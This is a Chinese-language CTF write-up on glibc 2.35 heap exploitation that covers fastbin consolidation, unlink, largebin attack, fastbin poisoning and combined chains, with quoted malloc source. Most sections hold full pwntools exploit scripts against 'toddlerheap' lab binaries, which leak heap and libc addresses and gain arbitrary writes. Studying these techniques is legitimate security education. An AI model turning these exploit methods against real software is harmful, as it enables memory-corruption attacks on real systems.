1. fastbin consolidation
1.1 uaf + fastbin consolidation泄露flag
场景是:
1. 只能申请小于0x400的堆块,存放堆地址的空间只够16次
2. flag位于0x450的某个堆块中
3. 存在uaf漏洞
核心思路是构造fastbin中有一个chunk A(与top chunk相邻),利用fastbin consolidation的机制 + uaf,使flag申请下来的0x450的chunk B的起始地址与A一样。打印flag即可
from pwn import *
binary_path = "/challenge/toddlerheap_level1.0"
#binary_path = "./toddlerheap_level1.0"
p = process(binary_path)
def malloc(idx,size):
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
return
def free(idx):
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
return
def puts(idx):
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
return
for i in range(8):
malloc(i,0x70)
for i in range(8):
free(i)
# gdb.attach(p)
# pause()
p.sendline(b"read_flag")
puts(7)
p.interactive()
1.1.1 变种: uaf + fastbin consolidation + 防止consolidate的chunk
一般这种题目的核心思路是控制chunk的总和满足某个条件
from pwn import *
binary_path = "/challenge/toddlerheap_level2.1"
binary_path = "./toddlerheap_level2.1"
p = process(binary_path)
def malloc(idx,size):
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
return
def free(idx):
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
return
def puts(idx):
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
return
def calloc(idx,size):
p.sendline(b"calloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
return
for i in range(8):
malloc(i,0x70)
for i in range(8):
free(i)
calloc(8,0x5b0)# fastbin consolidation: 7 equals 8
malloc(9,0x10) # in case of merging
calloc(10,0x5b0) # break the case
malloc(11,0x10) # in case of merging
free(10)
free(8)
# gdb.attach(p)
# pause()
p.sendline(b"read_flag")
puts(7)
p.interactive()
2. unlink
通过unlink能够解链,对某个地址的值进行改写
unlink的部分代码如下:
static void unlink_chunk (mstate av, mchunkptr p) {
if (chunksize (p) != prev_size (next_chunk (p)))//检查一
malloc_printerr ("corrupted size vs. prev_size");
mchunkptr fd = p->fd;
mchunkptr bk = p->bk;
if (__builtin_expect (fd->bk != p || bk->fd != p, 0))//检查二
malloc_printerr ("corrupted double-linked list");
fd->bk = bk;
bk->fd = fd;
2.1 unlink实现任意地址写
前提条件:一个已知的地址位置存放了一个指针:这个指针指向可以unlink的区域
绝大多数场景下,这个已知位置指global pointer,然后可以unlink的区域指能够堆溢出的chunk
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level5.1"
binary = "/challenge/toddlerheap_level5.1"
p = process(binary)
def malloc(idx,size):
p.recvuntil(b"[*] Function (malloc/read/free/puts/quit): ")
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def free(idx):
p.recvuntil(b"[*] Function (malloc/read/free/puts/quit): ")
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def puts(idx):
p.recvuntil(b"[*] Function (malloc/read/free/puts/quit): ")
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def read(idx,size,content):
p.recvuntil(b"[*] Function (malloc/read/free/puts/quit): ")
p.sendline(b"read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
#p.recvuntil(b"[*] read(0, allocations")
p.send(content)
def safe_read(idx,content):
p.recvuntil(b"[*] Function (malloc/read/free/puts/quit): ")
p.sendline(b"safe_read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"[*] read(0, allocations")
p.send(content)
p.recvuntil(b"Reading the flag into ")
flag_addr = int(p.recvuntil(b".\n").strip(b".\n"),16)
log.success(f"flag_addr: {hex(flag_addr)}")
chunk0_ptr = 0x404140
malloc(0,0x420)
malloc(1,0x420)
# gdb.attach(p)
# pause()
# create a fake chunk inside chunk0
payload = p64(0)+p64(0x420)+p64(chunk0_ptr-0x18)+p64(chunk0_ptr-0x10)+b"\x00"*(0x420-0x20)
payload += p64(0x420)+p64(0x430) # chunk1 pre_size, size
read(0,len(payload),payload)
free(1) # trigger unlink
# now chunk0_ptr -> &chunk0_ptr -0x18
# mod chunk0_ptr -> flag_addr
payload = b"\x00"*0x18 + p64(flag_addr)
read(0,0x20,payload)
puts(0)
p.interactive()
3. largebin attack
glibc2.35的情况下,关于large bin的检查有如下两个:(前情提要:large bin的fd、bk指向相同size的其他chunk,而fd_nextsize、bk_nextsize指向其他放在这个bin中的不同大小的chunk)
Check 1 :
> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
> malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
Check 2 :
> if (bck->fd != fwd)
> malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
实际代码如下:
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);//实际返回的总是一对哨兵的 fd 字段地址 —— 也就是该 bin 的头结点
fwd = bck->fd;
/* maintain large bins in sorted order */
// 维护largebin的顺序
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert(chunk_main_arena(bck->bk));
if ((unsigned long)(size) < (unsigned long)chunksize_nomask(bck->bk))
{
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // 从这里进行任意写利用!
}
else
{
assert(chunk_main_arena(fwd));
while ((unsigned long)size < chunksize_nomask(fwd))
{
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}
if ((unsigned long)size == (unsigned long)chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely(fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr("malloc(): largebin double linked list corrupted (bk)");
}
}
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}
// 添加到bin中,链表添加成员
mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
现在利用前提如下:
1. largebin chunk的bk_nextsize可以被修改
2. 需要被整理进largebin的unsortedbin chunk size为largebin中的最小
exp如下:
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level4.1"
binary = "/challenge/toddlerheap_level4.1"
p = process(binary)
def malloc(idx,size):
p.recvuntil(b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): ")
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def free(idx):
p.recvuntil(b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): ")
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def puts(idx):
p.recvuntil(b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): ")
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def safe_read(idx,content):
p.recvuntil(b"[*] Function (malloc/safe_read/free/puts/send_flag/quit): ")
p.sendline(b"safe_read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
#p.recvuntil(b"[*] read(0, allocations")
p.send(content)
malloc(0,0xbd8)
malloc(1,0xbb8) # guard
malloc(2,0xbc8)
malloc(3,0xbb8) # guard
malloc(4,0xbb8)
malloc(5,0xbb8) # guard
free(0)
# get main_arena_addr
puts(0)
p.recvuntil(b"Data: ")
main_arena_offset_0x60 = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
log.success(f"address: {hex(main_arena_offset_0x60)}")
malloc(6,0xbe8) # put #0 into largebin
free(2)
malloc(7,0xbe8) # put #2 into largebin
# get heap_addr
puts(0)
p.recvuntil(b"Data: ")
heap_addr = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
log.success(f"heap address: {hex(heap_addr)}")
# gdb.attach(p)
# pause()
# largebin attack
target = 0x4041C0
payload = p64(heap_addr)+p64(main_arena_offset_0x60)+p64(heap_addr)+p64(target-0x20)
safe_read(0,payload)
# pause()
free(4)
#pause()
malloc(8,0xbe8)
p.sendline(b"send_flag")
p.interactive()
4. fastbin attack
4.1 fastbin poison
fastbin和tcachebin类似,而且他的poison操作非常容易实现:
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level6.1"
binary = "/challenge/toddlerheap_level6.1"
p = process(binary)
def calloc(idx,size):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"calloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def malloc(idx,size):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def free(idx):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def puts(idx):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def read(idx,size,content):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
#p.recvuntil(b"[*] read(0, allocations")
p.send(content)
def safe_read(idx,content):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"safer_read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
#p.recvuntil(b"[*] read(0, allocations")
p.send(content)
def read_to_global(size,content):
p.recvuntil(b"[*] Function (calloc/read_to_global/safer_read/free/puts/quit): ")
p.sendline(b"read_to_global")
p.recvuntil(b"read_size: ")
p.sendline(str(size).encode())
p.send(content)
p.recvuntil(b"Reading the flag into ")
flag_addr = int(p.recvuntil(b".\n").strip(b".\n"),16)
log.success(f"flag_addr: {hex(flag_addr)}")
# fill tcache
for i in range(7):
calloc(i,0x18)
free(i)
# fastbin double free
calloc(0,0x18)
calloc(1,0x18)
free(0)
free(1)
#free(0) # 0->1->0
# get heap addr
puts(1)
p.recvuntil(b"Data: ")
encrypt_info = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
log.success(f"encrypt addr: {hex(encrypt_info)}")
one = (encrypt_info>>36)&0xfff
two = ((encrypt_info>>24)&0xfff)^one
three = ((encrypt_info>>12)&0xfff)^two
four = ((encrypt_info)&0xfff)^three
heap_addr = (one<<36)|(two<<24)|(three<<12)|four
log.success(f"heap_addr: {hex(heap_addr)}")
# fastbin attack
payload = (flag_addr-0x38) ^ (heap_addr>>12)
safe_read(1,p64(payload))
## change size field
payload = b"a"*(0x158-0x20-0x18)+p64(0)+p64(0x20)+p64(0)
read_to_global(0x158-0x20,payload)
# gdb.attach(p)
# pause()
calloc(2,0x18)
calloc(3,0x18)
payload = b"a"*0x158
read_to_global(0x158,payload)
puts(3)
p.interactive()
4.2 fastbin double free -> tcachebin
使用场景:
1. 只使用malloc分配
2. 只有double free漏洞
利用思路:
1. 申请9个chunk,标号从0开始
2. 释放[0,7)的chunk
3. 释放chunk 7,再释放chunk 8, 再释放chunk 7, 这样fastbin中将形成7->8->7的链条
4. 申请7个chunk,清空tcachebin
5. 继续申请chunk,触发fastibin放入tcachebin的逻辑,此时7会被返回,tcachebin中留存8->7->8的链
6. 修改7的内容,时tcachebin链为8-7->x
7. 申请8,申请7,申请x,即可完成任意地址写原语
5. 综合利用
了解、掌握了各个攻击的单点攻击手法,还是不够的,现在的ctf(包括现网环境),往往单点的攻击手法已经无法突破已有的防御手段了(或只达成了部分目的),所以,综合利用多个漏洞/攻击手法是现在的解决方案。
5.1 案例一: fastbin attack + unlink
上文提到:unlink的使用场景通常是一个已知的地址中存放指向chunk的指针,且这个chunk是可以被unlink的
结合fastbin
攻击的话,我们可以先在fastbin中伪造一个假chunk,利用fastbin poison
获得该chunk,继而修改下一个chunk的大小,实现unlink。
unlink时,并不关注上一个chunk的大小,另外要注意,我们只需要consolidate backward,不需要forward
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level7.1"
binary = "/challenge/toddlerheap_level7.1"
p = process(binary)
def calloc(idx,size):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"calloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def malloc(idx,size):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def free(idx):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def puts(idx):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def read(idx,size,content):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
#p.recvuntil(b"[*] read(0, allocations")
p.send(content)
def safe_read(idx,content):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"safer_read")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
#p.recvuntil(b"[*] read(0, allocations")
p.send(content)
def read_to_global(size,content):
p.recvuntil(b"[*] Function (calloc/safer_read/free/puts/quit): ")
p.sendline(b"read_to_global")
p.recvuntil(b"read_size: ")
p.sendline(str(size).encode())
p.send(content)
p.recvuntil(b"Reading the flag into ")
flag_addr = int(p.recvuntil(b".\n").strip(b".\n"),16)
log.success(f"flag_addr: {hex(flag_addr)}")
# step 1: fill tcachebin
for i in range(7):
calloc(i,0x30)
free(i)
calloc(0,0x30)
calloc(1,0x30)
calloc(2,0x30)
for i in range(16):
calloc(3,0x30)
calloc(4,0x30)
free(1)
free(0) # 0-> 1
# step 2: get heap_addr
puts(0)
p.recvuntil(b"Data: ")
heap_addr = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
one = (heap_addr>>36)&0xfff
two = ((heap_addr>>24)&0xfff)^one
three = ((heap_addr>>12)&0xfff)^two
four = ((heap_addr)&0xfff)^three
heap_addr = (one<<36)|(two<<24)|(three<<12)|four
log.success(f"heap_addr: {hex(heap_addr)}")
# step 3: create a fake chunk
calloc(0,0x30) # get 0 again
payload = p64(0)+p64(0x40) +p64(heap_addr>>12)# create fake chunk's pre_size and size
safe_read(0,payload)
payload = p64((heap_addr>>12)^(heap_addr-0x30)) # fastbin poison
safe_read(1,payload)
calloc(1,0x30)
calloc(5,0x30) # now 5 -> 1+0x10 , create oom condition!
# step 4: mod chunk_0 and chunk_5 to achieve unlink
payload = p64(0)+p64(0x31)
safe_read(0,payload)
heap_struct_addr = flag_addr-(0x4218-0x4040) +0x100 # &0
payload = p64(heap_struct_addr-0x18)+p64(heap_struct_addr-0x10)+p64(0)+p64(0)+p64(0x30)+p64(0x440) # chunk1 pre_size & size
safe_read(5,payload)
free(1) # unlink,make sure we won't consolidate forward
# step 5: make 0 -> flag_addr
payload = b"\x00"*0x18+p64(flag_addr)
safe_read(0,payload)
puts(0)
# gdb.attach(p)
# pause()
p.interactive()
5.2 案例二:tcache泄露地址+ off_byte_null+unlink
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
#binary = "./toddlerheap_level8.1"
binary = "/challenge/toddlerheap_level8.1"
p = process(binary)
def malloc(idx,size):
p.sendline(b"malloc")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
p.recvuntil(b"Size: ")
p.sendline(str(size).encode())
def free(idx):
p.sendline(b"free")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def puts(idx):
p.sendline(b"puts")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
def read_copy(idx,content):
p.sendline(b"read_copy")
p.recvuntil(b"Index: ")
p.sendline(str(idx).encode())
#p.recvuntil(b"[*] read(0, stack_buffer)")
p.send(content)
def read_flag():
p.sendline(b"read_flag")
# step 1: leak heap addr:
malloc(0,0x20)
free(0)
malloc(0,0x20)
puts(0)
p.recvuntil(b"Data: ")
heap_base = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))<<12
log.success(f"heap_base: {hex(heap_base)}")
# step 2: leak the libc addr:
malloc(1,0x500)
malloc(2,0x10) # guard
free(1)
malloc(1,0x500)
puts(1)
p.recvuntil(b"Data: ")
libc_base = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))-0x219ce0
log.success(f"libc_base: {hex(libc_base)}")
# step 3: use off_byte_null to create fake chunks
malloc(3,0xb8) # 0xc0
malloc(4,0x5AF) # 0x5c0
malloc(5,0x20) # guard
# gdb.attach(p)
# pause()
payload = p64(heap_base+0x810-0x18)+p64(heap_base+0x810-0x10)+p64(heap_base+0x7f0)+b"\x00"*(0xb0-0x18) + p64(0xc0)
read_copy(3,payload)
payload = b"\x00"*0x4f0+p64(0x500)+p64(0x21) # create a fake chunk, avoid conlidating
payload += b"\x00"*0x10+ p64(0)+p64(0xc1-0x20) # create a fake chunk, avoid conlidating
read_copy(4,payload)
# step 4: malloc a chunk to get flag
free(4) # cause consolidate
read_flag()
puts(3)
p.interactive()
6. 写在最后
写poc出现bug,或者遇到一些难题,或者你想要看看当前的利用方式,可以参考如下几个链接:
https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c
https://github.com/shellphish/how2heap/tree/master/glibc_2.35